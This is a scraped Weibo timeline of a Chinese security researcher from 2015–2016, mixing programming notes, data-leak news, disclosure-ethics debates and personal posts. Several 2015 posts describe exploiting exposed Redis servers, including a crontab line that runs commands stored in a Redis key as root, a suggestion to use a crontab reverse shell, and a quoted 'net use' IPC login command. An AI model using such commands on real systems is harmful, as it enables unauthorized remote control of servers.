用Go实现一个协程异步的Socks5服务,本地各种稳定快速,一部署到远程水管VPS上,各种DELAY和FAILED,Chrome & Proxy Switchy默认开启远程DNS解析,这个是最耗时和不稳定的,只能加个Dnsmasq缓存缓解。在爬虫和扫描器的httpClient那块,DNS解析也是造成性能缓慢的通病。 ​​​

8

3

6

ringzero

2016-10-07 来自 微博 weibo.com

社会上一些人对《注册申请受理通知书》存在误解,认为申请人拿到《注册申请受理通知书》就等同于取得了商标专用权,并对此进行炒作,对整个行业和社会造成不良影响。
@ringzero: 商标注册流程:商标查询(2天内)→申请文件准备(3天内)→提交申请(2天内)→缴纳商标注册费用→商标形式审查(1个月)→下发商标受理通知书→商标实质审查(12个月)→商标公告(3个月)→颁发商标证书。(2014.05.01实施新的商标法,商标实质审查期9个月。) ​​​

8

2

13

ringzero

2016-10-07 来自 微博 weibo.com

商标注册流程:商标查询(2天内)→申请文件准备(3天内)→提交申请(2天内)→缴纳商标注册费用→商标形式审查(1个月)→下发商标受理通知书→商标实质审查(12个月)→商标公告(3个月)→颁发商标证书。(2014.05.01实施新的商标法,商标实质审查期9个月。) ​​​

10

5

8

ringzero

2016-10-07 来自 微博 weibo.com

参照fasthttp的代码,重构一个Go的高并发httpClient,减轻runtime调度次数,删除不必要的Parser转换,直接操作RequestCtx,复用结构,减少没必要的对象。 网页链接 ​​​

7

4

12

ringzero

2016-10-05 来自 微博 weibo.com

市面上现在有带COMMAND键的机械键盘吗? ​​​

转发

34

7

ringzero

2016-10-04 来自 微博 weibo.com

18

1

5

ringzero

2016-09-27 来自 微博 weibo.com

HTTP网络流量复制工具,高性能(Go语言) 网页链接 ​​​

40

5

6

ringzero

2016-09-25 来自 微博 weibo.com

还有一种猥琐办法拦截爬虫,真实的客户端一定会请求favicon.ico。//@梁斌penny: 这种法子对付学生级爬虫够了,现在大多数都是真实浏览器内核改过来的,不用wget,curl这种了
@ringzero: 对抗机器爬虫的一种办法,浏览器客户端发起的HTTP请求,Headers的顺序是有讲究的。而很多爬虫在定义Headers的时候,使用的变量vector都是无序随机的。 ​​​

29

10

16

ringzero

2016-09-25 来自 微博 weibo.com

对抗机器爬虫的一种办法,浏览器客户端发起的HTTP请求,Headers的顺序是有讲究的。而很多爬虫在定义Headers的时候,使用的变量vector都是无序随机的。 ​​​

72

4

14

ringzero

2016-09-25 来自 微博 weibo.com

MYSQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式, utf8_general_ci不区分大小写, Ä = A, Ö = O, Ü = U 这三种条件都成立, 对于utf8_general_ci下面的等式成立:ß = s ,但是,对于utf8_unicode_ci下面等式才成立:ß = ss 。 ​​​

50

8

36

ringzero

2016-09-23 来自 手机微博触屏版

Yahoo!今天确认5亿用户信息遭黑客攻击泄露,信息包含 : 用户名,姓名,生日,联系电话,加密过的密码,安全问题和答案(部分未加密)。 ​​​

22

8

18

ringzero

2016-09-23 来自 手机微博触屏版

Yahoo confirmed 500 million users info leaked —The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers. ​​​

10

3

4

ringzero

2016-09-19 来自 微博 weibo.com

一个非常友好的pymysql面向对象操作类(CURD)。网页链接 ​​​

42

6

21

ringzero

2016-09-18 来自 微博 weibo.com

Surge + Shadowsocks 梯子原理, 利用 iOS VPN隧道协议, 通过NESMVPNSession创建一个本地的VPN服务, 打开全局Socks代理,再用自动代理 proxy.pac 选项调控规则。 CODE: SimpleTunnel 网页链接 ​​​

33

10

30

ringzero

2016-09-18 来自 微博 weibo.com

自从Python、Go等脚本兴起后,Linux那块一些老的生态链出现了断层,比如说:2006年、2010年的几个C项目,使用了开源库libevent,随着CentOS的发展,内核更新&安全更新带动了一些开源库(openssl,libevent,lippcap)做出了大改动,没人维护的项目尴尬的死掉了,但是用脚本重写C项目,又总感觉不踏实。 ​​​

3

13

15

ringzero

2016-09-15 来自 手机微博触屏版

大家中秋节快乐
@猪儿虫小次郎: 花了几十分钟找回密码,就为发一张截图。 ​​​

27

6

15

ringzero

2016-09-14 来自 微博 weibo.com

写脚本有个尴尬的地方,完成代码功能往往不费时,但是写个README,却要花费两倍或者更多的时间。 ​​​

6

17

27

ringzero

2016-09-14 来自 微博 weibo.com

未来这群人也是抵制「人工智能」的主力军, 机器最大的特点就是理性和超智慧,更不会和人讲人情味。
@jolestar: 阿里月饼事件看各路公众大V的言论,发现不懂技术的人对技术人有一种近似巫师的恐惧感,觉得这帮人要是不被约束一下,随手就有可能抢了自己的月饼,乃至抢了自己的房子,老婆,公司... 恨不能揪出几个烧死来以儆效尤。但就是不好好了解下漏洞,后门,刷票,以及自动化脚本之间的区别。 ​​​

45

8

15

ringzero

2016-09-14 来自 微博 weibo.com

黑名单做骚扰拦截,还是有些缺陷,要是我的手机号被人恶意举报打标签,怎么办?要是能够让用户自己设置白名单规则会更好,直接默认只接受(020,熟悉地区以内的固话),然后手机号做地区划分。
@子柳: 今晚就等这个了,大快人心的大好事,快了又快! ​​​

6

9

5

ringzero

2016-09-14 来自 微博 weibo.com

阿里程序员 :
我的程序再也不会有BUG了,因为领导会把找BUG的人开除掉。

其它程序员 :
我的程序再也不会有漏洞了,因为领导会把找漏洞的人抓起来。 ​​​

36

18

64

ringzero

2016-09-13 来自 微博 weibo.com

做安全的人,对于系统的缺陷,都有着高度的敏感性,在没有规则约束的情况下,给你一个抢东西的机会,你要是抢不到,是会被同行笑话的。但是,换在「政治正确、价值观正确」第一的环境下,在你心里萌发出「技术挑战」「突破限制」这个想法的时候,就已经在犯错了。 ​​​

19

13

49

ringzero

2016-09-11 来自 微博 weibo.com

Golang为了补掉SSL心脏滴血漏洞,处理得有点尴尬,直接导致net/http包里的ListenAndServeTLS()不可用,Docker非常无辜的躺枪。网页链接 ​​​

4

1

18

ringzero

2016-09-09 来自 微博 weibo.com

hyperfox: Go语言开发的HTTP/HTTPS代理工具,可重放流量。网页链接 ​​​

44

3

10

ringzero

2016-09-09 来自 微博 weibo.com

Adobe ColdFusion 11之前的版本,全部存在XML实体注入漏洞。网页链接 ​​​

8

2

14

ringzero

2016-09-08 来自 微博 weibo.com

iPhone7硬件设计:小尺寸接口胜于大尺寸接口,通用接口胜于单一功能接口,高速接口胜于低速接口,数字接口胜于模拟接口,防水接口胜于不防水接口,可盲插接口胜于不对称接口。 ​​​

4

9

17

ringzero

2016-09-05 来自 微博 weibo.com

可能若干年后,还会记得那些个日子的欢呼声,感叹声,
黑客竞赛,并不是开始,也不是结束,
只是在一段最醉人的时光里,遇见一群让你很难忘记的逗逼而已,
「爱屋及乌」,可能和这群逗逼在一起奋斗的回忆,也被你,在不知不觉之中,
刻进了你的灵魂之中。 ​​​

6

5

47

ringzero

2016-08-30 来自 微博 weibo.com

遗传算法机制:从互联网动态采集一些初始解,然后检测一下它们的「质量」。把最好的一半拿出来,让它们与现有的规则模型进行混合「交配」,产生新的一代解「子」。在新一代的解里再淘汰掉一半低质量的,如此反复一代代进化,解的质量会逐步提高。这种算法相当强大,还可以写诗。 网页链接 ​​​

4

4

18

ringzero

2016-08-25 来自 微博 weibo.com

《全国人大常委会关于加强网络信息保护的决定》规范了信息采集的行为,交互规范,和保护规范。希望能尽快实施执行,企业和国家一起努力,让诈骗、欺骗、信息泄露事件降低。网页链接 ​​​

3

3

18

ringzero

2016-08-24 来自 微博 weibo.com

骚扰电话可以忍,搞成「18岁准大学生被电信诈骗万元郁结离世」就过分了点。
@ringzero: 平均每天5个骚扰电话,泄露用户手机号的那些互联网公司,如果你们无法保障信息系统的安全,就不要强制我填手机号啊。 ​​​

11

21

13

ringzero

2016-08-23 来自 微博 weibo.com

单一无关联的数据泄露不可怕,最可怕的事情是你在不同地方的数据被汇总到一起,并且用于计算,也就是被「人物画像」。这将计算出整个人的生活轨迹,到这种状况才是毫无隐私可言。现在连买个手机卡、住个酒店、去网吧上网都需要身份证,将来出现这种情况将毫不惊奇。
@ringzero: 《隐私,信息以及信息安全》一份数据,一旦流传进公共领域,将无法被撤回或销毁。互联状况下,应该默认凡是以数字化形式存在的数据,都早晚会进入公共领域,即泄密。医生认为生死是自然规律,而普通人则觉得要避讳。人们对于自己越不了解的事情,越喜欢表现出来天然正义的样子。网页链接 ​​​

26

9

21

ringzero

2016-08-23 来自 微博 weibo.com

《隐私,信息以及信息安全》一份数据,一旦流传进公共领域,将无法被撤回或销毁。互联状况下,应该默认凡是以数字化形式存在的数据,都早晚会进入公共领域,即泄密。医生认为生死是自然规律,而普通人则觉得要避讳。人们对于自己越不了解的事情,越喜欢表现出来天然正义的样子。网页链接 ​​​

93

8

20

ringzero

2016-08-19 来自 微博 weibo.com

百万+并发请求:Python3新的异步asyncio库,使用requests多进程+多线程请求远程HTTP 100W+个文件目录,对比用asyncore.dispatcher构造原生socket buffer,性能损耗太明显,不得不放弃requests。网页链接 ​​​

25

11

20

ringzero

2016-08-16 来自 微博 weibo.com

美国NSA方程式组织(Equation Group)爆出的事件,通过分析对应攻击Payload的文件名,就能分析出来具体哪些防火墙版本受到影响了。网页链接 ​​​

120

13

13

ringzero

2016-07-18 来自 微博 weibo.com

有一个东西叫时间差,耿直的机器,往往容易被欺负。利用场景非常多,比如:你向服务器扔一个50M大的正常数据包,再扔一个50M带有攻击特征的数据包,对比时间差,就能判断那台服务器是不是蜜罐,或者是否启用了安全防御功能了。 网页链接 ​​​

29

11

32

ringzero

2016-07-15 来自 微博 weibo.com

微博有一个非常简单的「分析水军」办法,就是看他们发表评论的客户端来源,是否和他们经常发微博使用的客户端一致。比如某某几乎只使用iphone客户端,而热评里面却变成了Vivo或者Oppo。网页链接 ​​​

16

9

18

ringzero

2016-07-15 来自 微博 weibo.com

51

12

9

ringzero

2016-07-15 来自 微博 weibo.com

同意,idea在没有Run起来之前,都只是喧嚣。Make it Run, Make it Correct, Make it Fast,能走完第一步的毕竟是少数。
@白帽汇赵武: 明天参加2016年阿里安全峰会《聚力·赋能》,在创新沙盒论坛分享关于《安徒生企业威胁感知平台》的议题。所谓的创新沙盒,就是把idea放出去然后“等待抄袭”。我认为idea并不值钱,但它具有一种激励意义:“你看他们都做出来了,我们赶紧的”。事实上可能说的没做好,听的倒做好了,拼的还是执行力。 ​​​

12

2

15

ringzero

2016-07-13 来自 微博 weibo.com

最好的攻击算法能最大化防守能力。 ​​​

4

6

26

ringzero

2016-07-11 来自 微博 weibo.com

2016乌云白帽大会,我的幻灯片下载地址:网页链接 ​​​

89

28

44

ringzero

2016-07-06 来自 微博 weibo.com

火眼公司(FireEye)发布研究报告:《2015年多起数据泄露事件带给我们的经验和教训》,数据泄露作为攻击向量的放大器,现在才引起重视。网页链接 ​​​

13

5

6

ringzero

2016-07-05 来自 微博 weibo.com

//@互联网的那点事: 湖北的猪游泳自救,安徽的猪水中等死,同样是猪,差别怎么这么大咧!而就在现在,安徽的猪正在享受救援。这两则新闻告诉我们,做人要像做猪一样,要学会哭穷,要学会装可怜。那些勇敢的,有时是最SB的!
@人民日报: 【拯救“诀别”猪:安徽6000多头猪被泡超20小时,正救援】昨天,有媒体报道:安徽六安市一家养殖场因大雨被淹,6000多头生猪浸泡水中。员工撤离前,最后一次涉水走进猪舍,与猪诀别......据@中安在线 今早,一家公司成立的救援组赶到猪场。目前,正调用铲车等工具,将生猪妥善运送出去。 ​​​

11

1

13

ringzero

2016-06-30 来自 微博 weibo.com

有人冷眼旁观,有人冷嘲热讽,都在等“你”当炮灰后,分一口带血的馒头。
@hi_heige: “生活总是这样,有人干 有人看 还有人在捣乱” ​​​

16

8

30

ringzero

2016-06-29 来自 微博 weibo.com

用python实现沙盒雏形(SandBox,蜜罐),根据RFC标准,模拟启动一堆假服务,提取分析数据包内的攻击行为,对比做扫描器的时候,命中率最高的那些漏洞规则,向网管发出入侵警报。网页链接 ​​​

25

8

7

ringzero

2016-06-27 来自 微博 weibo.com

乌云模式下,企业一直都拥有拒绝的权利,他们为什么不提出抗议?对于白帽子提交的漏洞,直接点“忽略漏洞”,然后在厂商回复那里留下:“不要测试我,谁测试我,我就报警了”。就像你到商店买东西,内设监控警示语一样。 ​​​

31

20

25

ringzero

2016-06-25 来自 微博 weibo.com

善源起于心,但人心难测。--路人甲
@tombkeeper: 有人向乌云提交某网站的 SQL 注入漏洞,测试中抓了 4000 条用户信息,然后厂商就找公安把人抓了。可能很多人不知道:按《刑法》285 条第 2 款及相关司法解释,入侵获取金融证券系统身份认证信息 10 条以上、一般系统 500 条以上,就可以判刑。以后开安全会议,可以考虑找个熟悉相关法律的律师普普法。 ​​​

19

8

29

ringzero

2016-06-24 来自 微博 weibo.com

平均每天5个骚扰电话,泄露用户手机号的那些互联网公司,如果你们无法保障信息系统的安全,就不要强制我填手机号啊。 ​​​

42

49

37

ringzero

2016-06-20 来自 微博 weibo.com

很多WEB中间件的容器都是Windows,比如weblogic,JBoss,而weblogic天生就存在一个SSRF漏洞,不仅可以用于SMBRelay,现在某些场景又多了一条BadTunnel的路子。
@tombkeeper: BadTunnel 攻击的一个有趣之处:如果有人试图调用系统的 NetBIOS 相关函数来扫描别人的 NBNS 信息,或者试图类似这样 net use \\8.8.8.8\$IPC /user:administrator password 来攻击别人,反而会让自己可能受到 BadTunnel 攻击。这正是:以彼之(隧)道,还施彼身。 ​​​

5

1

11

ringzero

2016-06-13 来自 微博 weibo.com

当你发现myspace.thecthulhu.com域名的A记录成功解析到151.80.190.129的时候,就可以加个https://访问了。网页链接 ​​​

5

4

8

ringzero

2016-06-07 来自 微博 weibo.com

国外信息泄露事件历史,总计10亿多条。网页链接 ​​​

54

24

24

ringzero

2016-06-03 来自 手机微博触屏版

搭车学习数据分析。[微笑]
@phunter_lau: 感谢乌云白帽大会盛情邀请,我会在大会上分享我们组的一些微小的工作,从DNS数据上自动抓恶意软件的C&C切入讲讲安全数据的自动智能机器分析。大家说visibility看见的能力就是异常检测就是pewpewpew,而我们认为visibility还应该包括之后的自动化聚类分类和特征分析。网页链接 @乌云知识库 ​​​

1

1

9

ringzero

2016-05-31 来自 微博 weibo.com

微型高压脉冲发生器,USB一接入,瞬间放电,毁灭机器。[泪] 还真有这玩意! ​​​

78

30

36

ringzero

2016-05-31 来自 微博 weibo.com

这个漏洞有意思,按照时间有规则的增长,就能被预测。 网页链接 ​​​

5

6

10

ringzero

2016-05-28 来自 微博 weibo.com

@李俊 逝去的青春 [偷笑][偷笑] //@江宁公安在线: 古董级的木马和病毒。这俩流行的时候还是既没有微信也没有微博甚至连win7,iphone,安卓都没发布的时代,那是程序猿们逝去的青春[拜拜]
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

30

7

2

ringzero

2016-05-19 来自 微博 weibo.com

不管是国内,还是国外的传统安全厂商,都保留着一些传统的坏习惯,比如,都喜欢开一个匿名的ftp服务,让购买了产品的客户来远程更新补丁,然后骇客就能直接解压补丁,接触到产品源码了。可以说,那些安全公司的产品,只要出了带WEB服务功能的,都是渣。 ​​​

19

14

27

ringzero

2016-05-18 来自 微博 weibo.com

国内写APT文章的,炒APT概念的那帮人,不怎么会WEB啊,以至于没东西可讲了不是么?
@安全_云舒: 看了网页链接这个文章。写得比较清晰,还不错。只是我好奇的是,APT的定义到底是什么。给员工发个木马,员工执行了,然后公司被渗透,这就叫做APT么?是不是任何从客户端发起的攻击都叫APT? ​​​

2

1

5

ringzero

2016-05-16 来自 微博 weibo.com

色情网站 Pornhub 因为一个不起眼的目录遍历漏洞被攻击得遍体鳞伤,然后 Pornhub 开始启用漏洞奖励计划,最高奖励 2.5w 刀,问题是没发生这事之前你们怎么想的?网页链接 ​​​

7

3

13

ringzero

2016-05-09 来自 微博 weibo.com

开启HackerOne打怪升级之路,国内的鱼塘太脏,一言不合就下网,真不适合遨游。改变不了这个环境,就只能远离它,如果你的目标足够有野心,新的环境足够疯狂,即使混得不怎样,失败了也能有相当不错的成就。 ​​​

32

26

38

ringzero

2016-05-05 来自 微博 weibo.com

今晚接着拔网线好了。。。//@ringzero: 网管们、码农们,今晚适合拔网线、关机或者关服务;
@ringzero: 有的时候,面对攻击,你根本不需要出手,只要退一步(关服务),就能绝处逢生了。--Juniper ScreenOS ​​​

5

6

10

ringzero

2016-05-05 来自 微博 weibo.com

行业封闭确实能够掩盖很多问题,等到有天遮羞布被拿开(行业透明),撒的谎吹的牛就都掩饰不住了。“未授权等于网络犯罪、国产自主可控才能保证主权安全”是一滩潮水,潮水退了,才知道谁在裸泳。裸泳的人,当然会觉得这潮水是如此重要。 ​​​

25

2

40

ringzero

2016-04-29 来自 微博 weibo.com

国内很多python培训班的课程,在讲Socket编程的时候,老师全都喜欢用pickle序列化好数据后,再传给Socket Server来读,这样学员们依葫芦画瓢写出来的服务端就很尴尬了。 ​​​

8

12

26

ringzero

2016-04-26 来自 微博 weibo.com

网管们、码农们,今晚适合拔网线、关机或者关服务;
@ringzero: 有的时候,面对攻击,你根本不需要出手,只要退一步(关服务),就能绝处逢生了。--Juniper ScreenOS ​​​

31

12

29

ringzero

2016-04-26 来自 微博 weibo.com

扫描器里面,命中率最高的那些规则,是蜜罐最好的策略。今天感触良多,不能用矛与盾的方法搞安全,因为根本就没有绝对的静态安全,矛始于古代战术未精之时,而今,武术多变 (攻击艺术),均以繁取胜,以多矜奇。
@ringzero: 把写扫描器用的测试环境拼凑打个包,锚几个命中规则,就是一个蜜罐系统了,一定要有整理、记录、分类的好习惯。 ​​​

5

3

13

ringzero

2016-04-23 来自 微博 weibo.com

赞同尺度观点,窃取、篡改、删除企业的数据,对业务运行造成影响肯定是违法的。我想大多数人的初心是希望协助企业与行业来解决实际存在的安全问题,让互联网更健康安全,让安全从业者被重视和能力有所发挥吧。 //@yuange1975: 如果只是简单的访问肯定不违法,但是超过尺度就是违法。
@ringzero: 你使用了盗版的操作系统,跑了使用 GNU 开源协议的中间件,用着开源的语言写了个网站,还私自架设了未备案的服务器,我访问了你一下,你说我违法了。 ​​​

1

1

9

ringzero

2016-04-22 来自 微博 weibo.com

没有乌云很难想象今天国内的网络安全环境会是啥样子 我看见很多年轻人以加入乌云为荣 也看见乌云对这些年轻人起到了正向的引导作用 其善大焉 希望圈里朋友不要因为一条新闻就简单对白帽子做有罪推定。@bricolear ​​​

52

21

51

ringzero

2016-04-22 来自 微博 weibo.com

你使用了盗版的操作系统,跑了使用 GNU 开源协议的中间件,用着开源的语言写了个网站,还私自架设了未备案的服务器,我访问了你一下,你说我违法了。 ​​​

21

16

31

ringzero

2016-04-21 来自 微博 weibo.com

手上没神器,怎能做到一出场就赢呢? ​​​

1

8

10

ringzero

2016-04-20 来自 微博 weibo.com

我的迅雷 VIP7 年费 超级会员,居然被盗了,你说尴尬不尴尬?更可气的是,盗号的还在我的离线下载记录里面,留下辣么多羞羞脸的东西。。。 @迅雷会员 ​​​

16

56

47

ringzero

2016-04-19 来自 微博 weibo.com

大多数人由于知识(纯粹的智商)贫乏,导致几乎没有了独立思考的能力,所以他们特别担心人工智能拥有独立思想。因为人工智能有个最大的特点就是理性,不会和人讲人情味!!! ​​​

13

8

44

ringzero

2016-04-18 来自 微博 weibo.com

还好注释了,不然就是一个远程命令执行 ​​​

11

18

26

ringzero

2016-04-13 来自 微博 weibo.com

在这件事上,徐翔犯了一个低级错误,他给中信操盘手打的这个电话被监控录音记录在案了。公安部就从美特斯邦威作为切入口来调查,先抓到操盘手,然后把徐翔供出来了。
@ringzero: 上海有一个著名的“官二代”,跟着徐翔一起炒股票,重仓买入美特斯邦威后被套牢了。这个【官二代】向徐翔抱怨,于是徐翔立刻打了个电话给【中信证券】的操盘手,这个操盘手就在7 月8 日之后重仓买入了美特斯邦威15% 的股份,而美特斯邦威并未作出公告。 ​​​

151

11

17

ringzero

2016-04-13 来自 微博 weibo.com

上海有一个著名的“官二代”,跟着徐翔一起炒股票,重仓买入美特斯邦威后被套牢了。这个【官二代】向徐翔抱怨,于是徐翔立刻打了个电话给【中信证券】的操盘手,这个操盘手就在7 月8 日之后重仓买入了美特斯邦威15% 的股份,而美特斯邦威并未作出公告。 ​​​

175

31

26

ringzero

2016-04-07 来自 微博 weibo.com

32

2

8

ringzero

2016-04-05 来自 微博 weibo.com

微博上有人说,贵国信息安全从业者的薪酬会水涨船高, 傻子们还是不要跟着起哄得好,再怎么涨也和你无关。参考:http://t.cn/RqUc80g
该微博因被多人举报,根据《微博社区管理规定》,已被删除。查看帮助:http://t.cn/Rfd14WY

9

4

17

ringzero

2016-04-01 来自 微博 weibo.com

借鲁迅《聪明人和傻子和奴才》,隐喻那些曾经给信息安全行业砸过墙的傻子们 ​​​
长图

18

4

29

ringzero

2016-03-22 来自 微博 weibo.com

学习内容平均留存率最高的是:实践 && 传授他人。 ​​​

114

17

77

ringzero

2016-03-20 来自 微博 weibo.com

最近感觉心脏负荷有点重,开始把每天喝的V超大杯美式咖啡换成了G大杯美式咖啡,外加兑两份脱脂牛奶,30以后,成熟男人开始懂得爱惜自己的身体。 ​​​

2

19

24

ringzero

2016-03-16 来自 微博 weibo.com

中概回A股借壳,被黑客入侵窃听,得知内幕后带着穷苦兄弟们劫了BAT大佬们的胡,触动了大佬的利益,大佬不惜重金派出杀手追杀,黑客亡命天涯の苟富贵勿相忘的故事。 ​​​

12

14

37

ringzero

2016-03-10 来自 微博 weibo.com

最近在疯狂的寻找改善生活的利器(最好带可编程控制器),童鞋们有啥推荐的吗?下面是近期入手了两个小东西:手压切丝机,inokim QUICK 2 电动滑板车,购买链接见评论。 ​​​

3

21

9

ringzero

2016-03-03 来自 微博 weibo.com

超过 90 秒的任务 & 重复两次以上的任务,不自动化,你好意思说自己是黑客? ​​​

21

20

39

ringzero

2016-03-01 来自 微博 weibo.com

弗洛伊德认为当个体所受到的刺激超过了本身控制和释放能量的界限时,个体就会产生不安全感。比如房价上涨、股市暴跌…… ​​​

6

10

20

ringzero

2016-02-29 来自 微博 weibo.com

二、三、四线城市劫持的比较惨,一线城市相对来讲没那么猖狂。
@乌云-漏洞报告平台: 今天,你被运营商 “上” 了么?如今这年头,没被运营商“上”过(劫持)都不好意思说自己是中国网民!白帽子通过一个案例来解读最近很常见的手机安装包恶意替换案例,发现这运营商劫持这勾当已经非常成熟了。 今天,你被运营商 “上” 了么? ​​​
乌云-漏洞报告平台

今天,你被运营商 “上” 了么?

33

5

6

ringzero

2016-02-26 来自 微博 weibo.com

工程师的主要目的是改变世界,科学家是解释世界。 ​​​

12

14

43

ringzero

2016-02-19 来自 微博 weibo.com

能量守恒定律,这么多iPhone手机用户,玻尔兹曼常数放大,会使地球温度上升,间接导致海平面上升,北极熊宝宝无家可归。
@手机iPhone频道: 【iPhone 7重磅功能曝光:远程无线充电!】据Energous透露苹果已经在iPhone上测试无线充电了,如果一切顺利,iPhone 7上可能会出现基于Energous的无线充电方案,它酷的地方在于,只要设备在4.5米以内,都可以进行充电,简而言之就是不用接触。Energous对外表示,这项新技术将在2016年或2017年商业化。 ​​​

11

9

10

ringzero

2016-02-13 来自 微博 weibo.com

@orroz: 过年过的无聊啊,无聊! 一斤洽洽瓜子,我一个人磕完了,一共1854颗,26颗是空的,混进来9颗带虫的,有6颗没炒开,是连在一起的,还有4个是苦的。中间喝了7杯水。没错,这就是孤独。----刚刚这段话一共67个字,11个标点符号,其中8个逗号,3个句号,一共有587划,其中横78划,竖137划,撇65划,捺57划 ​​​...全文

23

6

13

ringzero

2016-02-01 来自 微博 weibo.com

14

6

13

ringzero

2016-01-31 来自 微博 weibo.com

在互联网上,夸奖别人是一件很难的事情,贬低别人是一件很容易的事情,能够持公平心看待事物的人却又往往保持沉默,最后,以至于神坛被各个行业的牛鬼蛇神给占据。
@Scalers: 我觉得各个领域里面的靠谱的人还是多努力在网络上发声,通过自己的表达,展现出领域的专业性与靠谱性。从个人角度,自己的事情做的好,然后过上好的生活,是很有满足感的事情,但如果顺便再对一批人产生力所能及的影响,是更进一步的成长。不然某一天你会发现,那些三脚猫功夫的非靠谱人士充斥于网络, ​​​...全文

23

6

15

ringzero

2016-01-17 来自 微博 weibo.com

蝙蝠侠悖论:蝙蝠侠想把一切都交给法律,然而哥谭市警察局却对大量的犯罪有心无力且毫无作为。 ​​​

2

2

8

ringzero

2016-01-02 来自 微博 weibo.com

在21比35的劣势情况下,鱼塘首领打出了一句:“你们一点求胜的欲望都没有,搞得我都不想继续打了”,小鱼听后,激昂地留下了眼泪,心想难道这就是业余和职业的差别?鱼塘首领又补充一句:“电子竞技的世界不相信眼泪,只信实力!”,遇上这么一个爱讲道理的鱼塘首领,小鱼们真是哭也不是,不哭也不是。 ​​​

3

13

13

ringzero

2016-01-01 来自 微博 weibo.com

如果你有两个选择:坐在家里看电视,还是跑步,那就跑步吧!-- 昨晚跑了一个小时,从2015(GMT+8)跑到了2016(GMT+8),运动后太兴奋,结果硬是失眠了,所以前面那句话告诉我们,要科学,不要任性。 ​​​

1

11

24

ringzero

2015-12-22 来自 微博 weibo.com

更正一下:是 “鼫鼠”;
@ringzero: 《荀子-劝学》里有一个比喻,"鼹鼠五能,不如墨鱼一技",鼹鼠是一种小飞鼠,有点像松鼠,它能飞,却飞不上屋顶;能攀,却爬不上树梢;能游,却度不过小水沟;能跑,却赶不上人走;能藏,却盖不住身体。它有五种技能,却没有一样拿得出手,很悲哀。--北向鼹鼠南向墨鱼 ​​​

4

2

2

ringzero

2015-12-22 来自 微博 weibo.com

《荀子-劝学》里有一个比喻,"鼹鼠五能,不如墨鱼一技",鼹鼠是一种小飞鼠,有点像松鼠,它能飞,却飞不上屋顶;能攀,却爬不上树梢;能游,却度不过小水沟;能跑,却赶不上人走;能藏,却盖不住身体。它有五种技能,却没有一样拿得出手,很悲哀。--北向鼹鼠南向墨鱼 ​​​

30

12

14

ringzero

2015-12-21 来自 微博 weibo.com

有的时候,面对攻击,你根本不需要出手,只要退一步(关服务),就能绝处逢生了。--Juniper ScreenOS ​​​

99

21

60

ringzero

2015-12-19 来自 秒拍网页版

讲真的,这个还可以 (FIESTAR)。 秒拍视频 . ​​​

76

57

36

ringzero

2015-12-10 来自 微博 weibo.com

一项研究发现,高颜值男性在职场中升职的难度较大,因为同事们不愿意提升比自己帅气的男人。(中国日报网12月9日引用英国《每日电讯报》报道) ​​​

19

12

7

ringzero

2015-12-10 来自 微博 weibo.com

用 具良治 G2,切土豆和切豆腐一样
@林萍在日本: 看一下日本厨师的刀,这酸爽,强迫症看着真舒服。[doge] 秒拍视频 ​​​

22

9

5

ringzero

2015-12-07 来自 微博 weibo.com

现在还有人在用固话吗?除了那些搞诈骗的、电话广告营销的。 ​​​

7

39

9

ringzero

2015-12-02 来自 微博 weibo.com

接下来,唐朝安全巡航会更名为「唐朝云安全」,将带着强烈的「安全数据运营」愿景登场,本次发布的tangscan 3.0产品,不再是一个扫描器,不再是扫描器,不单是扫描器。
@唐朝云安全: #唐朝安全巡航来袭#从去年提出自动化攻击的想法开始,到现在唐朝安全巡航正式与所有期待它的人见面,是整整【461】天的努力和付出。这一刻我们都等了太久,这一刻我想要分享给你!#12月16日,798秀剧场,唐朝安全巡航发布会,不见不散#活动报名链接:网页链接 ​​​

14

5

4

ringzero

2015-11-29 来自 微博 weibo.com

我有位家境一般的朋友,一直觉得如果自己有钱一定会更幸福。后来他爸做信息安全教育发财了。快十年后我见他,问:现在你倒是有钱了,你真的幸福吗?他回答:爽翻啦!我默默地走开了。 ​​​

21

17

44

ringzero

2015-11-25 来自 微博 weibo.com

乌云实业集团旗下子公司 @乌云Club ​​​

11

24

25

ringzero

2015-11-20 来自 微博 weibo.com

207

14

31

ringzero

2015-11-19 来自 微博 weibo.com

漏洞的修复程度 + 响应速度 = 利用技术公开普及率 + 利用通用程度 + 工具傻瓜程度 ​​​

8

4

19

ringzero

2015-11-11 来自 微博 weibo.com

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 'ringzero',这样可以控制第一条记录,就能保证你的内容始终保持在最前面 网页链接 ​​​

23

7

7

ringzero

2015-11-11 来自 微博 weibo.com

写入一个任务到/var/spool/cron/root,* * * * * sleep 10;eval `redis-cli get wycmd`|redis-cli -x set wycmdres; 每10秒读取一下wycmd的内容执行,保存到wycmdres;
@ringzero: 读了下redis的官方文档,可以不用反弹,不用正向连接(ssh服务),就能实现一个带回显的远程命令执行exp,明天起床写好了发乌云知识库 ​​​

17

3

2

ringzero

2015-11-11 来自 微博 weibo.com

读了下redis的官方文档,可以不用反弹,不用正向连接(ssh服务),就能实现一个带回显的远程命令执行exp,明天起床写好了发乌云知识库 ​​​

37

12

42

ringzero

2015-11-11 来自 微博 weibo.com

写crontab反弹shell不是更好吗?毕竟22端口对外开放的少 //@乌云-漏洞报告平台: 这个远程登录服务指的不是登录redis,而是redis所在服务器的SSH服务(远程管理),成功利用后就可以远程在服务器上执行命令操作。
@乌云-漏洞报告平台: redis是一款基于内存与硬盘的高性能数据库,在国内外被大型互联网企业、机构等广泛采用。但在国内企业对redis服务的安全配置不是很规范,导致存在远程登录服务器甚至提权操作的风险,目前乌云已经接到国内漏洞案例,请企业近期密切关注! 网页链接 ​​​
长图

4

6

11

ringzero

2015-11-10 来自 微博 weibo.com

又把一个登录任意用户微博的漏洞,藏进了我的大宝箱里 [阴险] @呆子不开口 ​​​

13

27

26

ringzero

2015-11-10 来自 微博 weibo.com

通过学习其它白帽提交的挑战思路并思考改进,能让白帽子得到成长和进步 //@xti9er: 干掉了然后呢?白帽子有什么收益?//@ringzero: 挑战发布不到一小时,就被人成功的干掉,哪位英雄干的啊? 网页链接

4

1

2

ringzero

2015-11-09 来自 微博 weibo.com

9

评论

9

ringzero

2015-11-09 来自 微博 weibo.com

16

6

8

ringzero

2015-11-09 来自 微博 weibo.com

这个phpinfo多线程分段LFI,命中率还不错 网页链接
